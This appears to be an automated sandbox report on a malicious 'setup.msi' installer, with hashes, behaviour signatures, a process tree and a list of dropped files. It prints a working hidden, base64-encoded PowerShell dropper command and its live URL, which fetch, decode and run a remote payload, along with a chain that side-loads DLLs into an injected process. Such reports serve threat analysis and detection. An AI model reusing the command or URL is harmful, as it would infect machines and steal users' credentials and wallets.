Analysis

  • max time kernel
    146s
  • max time network
    150s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240426-en
  • resource tags

    arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    28-04-2024 06:16

General

  • Target

    setup.msi

  • Size

    8.4MB

  • MD5

    7d0e7e9083315bddec9bbc60fbf30ba3

  • SHA1

    008eb06db4a300ae988ea004503382bec53f0743

  • SHA256

    572e7f82c29a2be6f927cb28c1125eb4f7e62f0d5e82e8489706a64e8e8302e2

  • SHA512

    8678ee4b95226e57d4ed867a3cec5827b01389e4542dccab48e11b10b14966117c698c4bd4e02ed752fb8383459a12b1d6cde3a6fdbe9bb87f4005ae72cab0bc

  • SSDEEP

    196608:KN6gYGIfVlhQ+gtODuwjWT6mPY6T/9dFr5Wfbr:KD3IfVlhQ+glwY6ArT6fb

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://opensun.monster/2704e.bs64

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Downloads MZ/PE file
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 18 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 14 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup.msi
    1⤵
    • Enumerates connected drives
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:4964
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:560
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding B28E38B3CD3BE46383D0C7E9E4DE7F72
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:5096
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss4B54.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi4B51.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr4B52.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr4B53.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2728
    • C:\Users\Admin\AppData\Roaming\publub\DuvApp\gpg.exe
      "C:\Users\Admin\AppData\Roaming\publub\DuvApp\gpg.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:3948
      • C:\Windows\SysWOW64\explorer.exe
        explorer.exe
        3⤵
        • Loads dropped DLL
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:3268
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwAHMAOgAvAC8AbwBwAGUAbgBzAHUAbgAuAG0AbwBuAHMAdABlAHIALwAyADcAMAA0AGUALgBiAHMANgA0ACIAKQA7AFsAQgB5AHQAZQBbAF0AXQAgACQAeAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHMALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAiAGIAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAQAAiACwAIgBoACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACQAIgAsACIAbQAiACkALgBSAGUAcABsAGEAYwBlACgAIgAlACIALAAiAHAAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAXgAiACwAIgB2ACIAKQApADsAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAHgALgBDAG8AdQBuAHQAOwAkAGkAKwArACkAewAkAHgAWwAkAGkAXQA9ACAAKAAkAHgAWwAkAGkAXQAgAC0AYgB4AG8AcgAgADEANgA3ACkAIAAtAGIAeABvAHIAIAAxADgAfQA7AGkAZQB4ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB4ACkAKQA=
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          PID:1608
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\HCFIIIJJKJ.exe"
          4⤵
            PID:2240

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Config.Msi\e5748e3.rbs

      Filesize

      17KB

      MD5

      45c9b679712d4ac4265adcce8defa18e

      SHA1

      cf33942ee8a32a64880f76519ebe7412a81fd106

      SHA256

      e2e142e764e12306378c34425a03cd5009af9017c53562094f13fc69b8a6e57b

      SHA512

      0ffd85c1a20e2276693926b4f26d3dd625339f91967cb4028050c9132985ab472613c93fd2d15c27b04a5175801053faea32d43b7d8000c63acba911a4c3f0de

    • C:\ProgramData\mozglue.dll

      Filesize

      593KB

      MD5

      c8fd9be83bc728cc04beffafc2907fe9

      SHA1

      95ab9f701e0024cedfbd312bcfe4e726744c4f2e

      SHA256

      ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

      SHA512

      fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

    • C:\ProgramData\nss3.dll

      Filesize

      2.0MB

      MD5

      1cc453cdf74f31e4d913ff9c10acdde2

      SHA1

      6e85eae544d6e965f15fa5c39700fa7202f3aafe

      SHA256

      ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

      SHA512

      dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      18KB

      MD5

      25a651a8c4514091908ecaebef18224e

      SHA1

      3e5bf6968a4571f2260fad0b12223e0c847d71c7

      SHA256

      661b34a7f6bcb910faeb9ed9f637efd572cb685e8d6046528fb731b5ca59fc59

      SHA512

      6983c380aed07bb9e53bb363ad1d4315b70b01c2a6ac570ff2bf5c78cb234095e192aa8a3312f72e0aa080bc52d84251b46319034bf035f50abb1df36cab3f94

    • C:\Users\Admin\AppData\Local\Temp\HCFIIIJJKJ.exe

      Filesize

      36B

      MD5

      a1ca4bebcd03fafbe2b06a46a694e29a

      SHA1

      ffc88125007c23ff6711147a12f9bba9c3d197ed

      SHA256

      c3fa59901d56ce8a95a303b22fd119cb94abf4f43c4f6d60a81fd78b7d00fa65

      SHA512

      6fe1730bf2a6bba058c5e1ef309a69079a6acca45c0dbca4e7d79c877257ac08e460af741459d1e335197cf4de209f2a2997816f2a2a3868b2c8d086ef789b0e

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dd0kgn2l.ajj.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\msi4B51.txt

      Filesize

      60B

      MD5

      eb0046beb949b23b97dccd59c4b8f131

      SHA1

      c084a9c15a323cd51d24122681a494e52577487f

      SHA256

      b6594a624b47bcac9a314993f15693e5da2a747adeccff4a996f4ab4491d5467

      SHA512

      8dfdbf11e27242ab14b0997637a9c3deb47d345183c306e0a9b6d62099f4b341dec49f8369bec7ef839e4003d8c7a86267646c9f7c28b8fe9456c3c69b2aeab0

    • C:\Users\Admin\AppData\Local\Temp\pss4B54.ps1

      Filesize

      6KB

      MD5

      30c30ef2cb47e35101d13402b5661179

      SHA1

      25696b2aab86a9233f19017539e2dd83b2f75d4e

      SHA256

      53094df6fa4e57a3265ff04bc1e970c10bcdb3d4094ad6dd610c05b7a8b79e0f

      SHA512

      882be2768138bb75ff7dde7d5ca4c2e024699398baacd0ce1d4619902402e054297e4f464d8cb3c22b2f35d3dabc408122c207facad64ec8014f2c54834cf458

    • C:\Users\Admin\AppData\Local\Temp\scr4B52.ps1

      Filesize

      542B

      MD5

      753240f3d0c58563dcba1244db69b0d7

      SHA1

      4a0f248fccc2431ece50f717cbf80f6681504932

      SHA256

      e77dbd670eaa228e96cb8ab002b0aa7f55a78779fb58754436ec691e6de14e5a

      SHA512

      03987837557d6342280d7871b19472e7c05cabc203824081f6fff38083ecef2da8135642644b598b21ee294816d1ed22d0573db04e5c739b2b08c28f7c441ae9

    • C:\Users\Admin\AppData\Roaming\publub\DuvApp\gpg.exe

      Filesize

      1.3MB

      MD5

      35365d3713500bde4e2e1422c54f04fa

      SHA1

      0b24b1de060caa7be51404d82da5fef05958a1da

      SHA256

      5f7e7bb9b2e73abda7e46bfb8b266dbbb7fd3b87ebb253d842ffcfb56f1efe19

      SHA512

      3e276b947220e56da8798245e9e7a16c9899a3842658ef409518968b137474cba7f13955287d1ff2fa7f929dc3ce75a8fd4c1f5fe58e6edb9e89986080aad375

    • C:\Users\Admin\AppData\Roaming\publub\DuvApp\libassuan-0.dll

      Filesize

      154KB

      MD5

      a2dd12a8ecef27ca0e524e9bb4bdb8f5

      SHA1

      a4f5718c8bc1cc1fba49332d767ad296f7156dbc

      SHA256

      e54d43ae67352ceb170ece1fc1a219de9baf70cb71c1bf85a6c52858e2ca0ada

      SHA512

      b35101d5454db885e4f47333365f3d3ce6ed20b94fb75f6965c6e04116967fb5179abaff92a2c20d47b634e81f5ac53e5e1f3def570dd95ae66a3663c0b1ea2c

    • C:\Users\Admin\AppData\Roaming\publub\DuvApp\libgcrypt-20.dll

      Filesize

      792KB

      MD5

      ed2da404c1bc70efc1a249f609a9cedd

      SHA1

      8abbf1a5b85d678385764cceb7457988beaf5117

      SHA256

      b4acc6c738ec4a72209ec67f3c1f8fd7e23fe4fe493686d2bc5c59dca26b9ac5

      SHA512

      ad997bd588c7c9867b198a0c4233d842a760176df653b457580bb6b6c9ccb1c751d999aba80de36182d42ea6549335ff6c67b3134655d60bf1e51fce1d93ec6b

    • C:\Users\Admin\AppData\Roaming\publub\DuvApp\libgpg-error-0.dll

      Filesize

      245KB

      MD5

      72498f59c8c580707a0a3839c332f51b

      SHA1

      fb09b912912610d243066cc8b71435f689e6a449

      SHA256

      51b69b17a15a4c8df35e81b9eef8b3c8eb914e8208f0ebbe9713661583cddf4d

      SHA512

      116956f25484e01236e5aaac2693e78dbc98e47580ac535a49582e21d69602be23f53f45945b0e94b2b0cf2825832a3e1c1f647302bd7b8398794f5579a0e022

    • C:\Users\Admin\AppData\Roaming\publub\DuvApp\libnpth-0.dll

      Filesize

      40KB

      MD5

      b7b148054a2818699d93f96139b4d0d0

      SHA1

      0a5187b37bd84c19a7d2d84f328fa0adbc75123c

      SHA256

      25fb8e6bb4ebd62bfa478691261ea2e9486020ef52084dad0fc5ea417338d915

      SHA512

      4f9938a2fb9f6c81cf0dc5d98ecda955e101b5fd52cc43fd58f0072f5ed914c0ef966cd0666c3bcc32f70d52847a5caedea40de86db28c94c8ebd35b366552c1

    • C:\Users\Admin\AppData\Roaming\publub\DuvApp\libsqlite3-0.dll

      Filesize

      1.2MB

      MD5

      0381964390751461a5d79d26ca7cedaa

      SHA1

      3b17b9dca5060f9b22920737165a6bd1de5e8941

      SHA256

      7b307806698bfe2b8a81cf0d04cfd0df4a9916cba30707ce3934b9ee06bd75da

      SHA512

      381e6c2d49016ca2c4435526eb2ac4997f0c43c9bbe3ce56bc0ade3b5cc14677101c1297bbf2a10cec16242124a9246ca5e46003512719dc8360af007fb79b05

    • C:\Users\Admin\AppData\Roaming\publub\DuvApp\zlib1.dll

      Filesize

      141KB

      MD5

      8f4cdaed2399204619310cd76fd11056

      SHA1

      0f06ef5acde4f1e99a12cfc8489c1163dba910d1

      SHA256

      df14c4dcb9793a1298c3ef531299479c8bea32a9e8124355e6d3ba6b15416213

      SHA512

      3d1e0453f10bece7b65fee3806bce9e36e2c526daa72d66774ed47684a591a978a80894b1643709e76db0adcf6f2dca189aa6413786a9b70c742ceaeec5b80dc

    • C:\Windows\Installer\MSI493E.tmp

      Filesize

      738KB

      MD5

      b158d8d605571ea47a238df5ab43dfaa

      SHA1

      bb91ae1f2f7142b9099e3cc285f4f5b84de568e4

      SHA256

      ca763693cc25d316f14a9ebad80ebf00590329550c45adb7e5205486533c2504

      SHA512

      56aef59c198acf2fcd0d95ea6e32ce1c706e5098a0800feff13ddb427bfb4d538de1c415a5cb5496b09a5825155e3abb1c13c8c37dc31549604bd4d63cb70591

    • C:\Windows\Installer\MSI4A7B.tmp

      Filesize

      758KB

      MD5

      fb4665320c9da54598321c59cc5ed623

      SHA1

      89e87b3cc569edd26b5805244cfacb2f9c892bc7

      SHA256

      9fb3156c665211a0081b189142c1d1ab18cda601ee54d5f5d8883ecfa4177a59

      SHA512

      b205552a3cfbaa2202e6ef7e39e229af167b2342a7dc4a2f4cadfe4d05000966cf19e9e208e44d6bb0fd6a56f4283caeed9c13f523e5b301b87f79febb1840cf

    • C:\Windows\Installer\e5748e0.msi

      Filesize

      8.4MB

      MD5

      7d0e7e9083315bddec9bbc60fbf30ba3

      SHA1

      008eb06db4a300ae988ea004503382bec53f0743

      SHA256

      572e7f82c29a2be6f927cb28c1125eb4f7e62f0d5e82e8489706a64e8e8302e2

      SHA512

      8678ee4b95226e57d4ed867a3cec5827b01389e4542dccab48e11b10b14966117c698c4bd4e02ed752fb8383459a12b1d6cde3a6fdbe9bb87f4005ae72cab0bc

    • memory/1608-210-0x000002B575D40000-0x000002B576268000-memory.dmp

      Filesize

      5.2MB

    • memory/1608-161-0x000002B574CD0000-0x000002B574CF2000-memory.dmp

      Filesize

      136KB

    • memory/1608-184-0x000002B575320000-0x000002B57533C000-memory.dmp

      Filesize

      112KB

    • memory/1608-209-0x000002B575640000-0x000002B575802000-memory.dmp

      Filesize

      1.8MB

    • memory/2728-45-0x0000000007A50000-0x00000000080CA000-memory.dmp

      Filesize

      6.5MB

    • memory/2728-52-0x0000000009160000-0x000000000968C000-memory.dmp

      Filesize

      5.2MB

    • memory/2728-51-0x00000000082A0000-0x0000000008462000-memory.dmp

      Filesize

      1.8MB

    • memory/2728-49-0x0000000008680000-0x0000000008C26000-memory.dmp

      Filesize

      5.6MB

    • memory/2728-48-0x00000000072A0000-0x00000000072C2000-memory.dmp

      Filesize

      136KB

    • memory/2728-47-0x0000000007310000-0x00000000073A6000-memory.dmp

      Filesize

      600KB

    • memory/2728-46-0x0000000006840000-0x000000000685A000-memory.dmp

      Filesize

      104KB

    • memory/2728-43-0x0000000006320000-0x000000000636C000-memory.dmp

      Filesize

      304KB

    • memory/2728-32-0x0000000005DC0000-0x0000000005E26000-memory.dmp

      Filesize

      408KB

    • memory/2728-41-0x0000000005E30000-0x0000000006187000-memory.dmp

      Filesize

      3.3MB

    • memory/2728-28-0x0000000004E40000-0x0000000004E76000-memory.dmp

      Filesize

      216KB

    • memory/2728-31-0x0000000005D50000-0x0000000005DB6000-memory.dmp

      Filesize

      408KB

    • memory/2728-29-0x0000000005570000-0x0000000005B9A000-memory.dmp

      Filesize

      6.2MB

    • memory/2728-30-0x0000000005450000-0x0000000005472000-memory.dmp

      Filesize

      136KB

    • memory/2728-42-0x00000000062E0000-0x00000000062FE000-memory.dmp

      Filesize

      120KB

    • memory/3268-282-0x00000000009C0000-0x00000000009E8000-memory.dmp

      Filesize

      160KB

    • memory/3268-159-0x00000000009C0000-0x00000000009E8000-memory.dmp

      Filesize

      160KB

    • memory/3268-216-0x0000000061E00000-0x0000000061EF3000-memory.dmp

      Filesize

      972KB

    • memory/3268-249-0x00000000009C0000-0x00000000009E8000-memory.dmp

      Filesize

      160KB

    • memory/3268-151-0x00000000009C0000-0x00000000009E8000-memory.dmp

      Filesize

      160KB

    • memory/3268-152-0x00000000009C0000-0x00000000009E8000-memory.dmp

      Filesize

      160KB

    • memory/3948-150-0x0000000001020000-0x0000000001045000-memory.dmp

      Filesize

      148KB

    • memory/3948-153-0x0000000000400000-0x000000000054C000-memory.dmp

      Filesize

      1.3MB

    • memory/3948-155-0x000000006B480000-0x000000006B4C1000-memory.dmp

      Filesize

      260KB

    • memory/3948-156-0x000000006A800000-0x000000006A80F000-memory.dmp

      Filesize

      60KB

    • memory/3948-157-0x0000000063080000-0x00000000630A9000-memory.dmp

      Filesize

      164KB

    • memory/3948-158-0x0000000066580000-0x00000000666AA000-memory.dmp

      Filesize

      1.2MB

    • memory/3948-154-0x0000000065A80000-0x0000000065AAA000-memory.dmp

      Filesize

      168KB